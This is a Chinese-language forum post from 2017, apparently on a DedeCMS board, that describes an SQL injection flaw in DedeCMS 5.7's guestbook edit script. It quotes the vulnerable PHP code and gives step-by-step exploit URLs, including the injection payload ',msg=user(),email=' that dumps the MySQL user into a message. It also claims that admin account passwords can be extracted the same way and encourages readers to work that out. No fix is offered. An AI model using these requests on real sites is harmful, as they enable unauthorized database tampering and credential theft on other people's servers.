公告:如果您的账号不能登录,可能是系统对您账号进行了保护,我们发现系统中存在着不安全密码,故对其重置,请您重新激活账号,对于给您造成的不便,敬请谅解!
论坛风格切换切换到宽版
  • 3307阅读
  • 0回复

多个安全软件检查漏洞 [复制链接]

上一主题 下一主题
离线fkenuiabcd
 

发帖
147
贡献值
53
威望值
20
技术分
0
织梦币
0
只看楼主 倒序阅读 使用道具 0 发表于: 2017-06-08
  • 网站地址:http://www.wtk6.com/
  • 版本:V5.7
  • 语言编码:UTF8
  • 是否更新最新补丁:尚未更新
  • 是否进行过修改:做过修改
漏洞文件路径:


plus/guestbook/edit.inc.php




漏洞文件edit.inc.php具体代码:
    if(!defined('DEDEINC')) exit('Request Error!');
    if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
    else $GUEST_BOOK_POS = "guestbook.php";
    $id = intval($id);
    if(empty($job)) $job='view';
    if($job=='del' && $g_isadmin)
    {
    $dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");
    ShowMsg("成功删除一条留言!", $GUEST_BOOK_POS);
    exit();
    }
    else if($job=='check' && $g_isadmin)
    {
    $dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");
    ShowMsg("成功审核一条留言!", $GUEST_BOOK_POS);
    exit();
    }
    else if($job=='editok')
    {
    $remsg = trim($remsg);
    if($remsg!='')
    {
    //管理员回复不过滤HTML
    if($g_isadmin)
    {
    $msg = "
".$msg."
\n".$remsg;
    //$remsg
管理员回复:

    }
    else
    {
    $row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");
    $oldmsg = "
".addslashes($row['msg'])."
\n";
    $remsg = trimMsg(cn_substrR($remsg, 1024), 1);
    $msg = $oldmsg.$remsg;
    }
    }
    //这里没有对$msg过滤,导致可以任意注入了
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
    ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS);
    exit();
    }
    if($g_isadmin)
    {
    $row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
    }
    else
    {
    $row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
    }
    漏洞成功需要条件:
    1. php magic_quotes_gpc=off
    2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。
    怎么判断是否存在漏洞:
    先打开 /plus/guestbook.php 可以看到别人的留言,
    然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
    访问:www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=90sec'&id=存在的留言ID
    提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
    跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 90sec' 如果变成了 那么证明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
    如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。
    那么再次访问 www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='
    然后返回,那条留言ID的内容就直接修改成了mysql 的user().
    大概利用就是这样,大家有兴趣的多研究下!!
    最后补充下,估计有人会说怎么暴管理后台帐户密码,你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)!!
电脑蓝屏网分享电脑故障、 不开机、 死机 、蓝屏 、自动重启、 等问题分享讲解~http://www.wtk6.com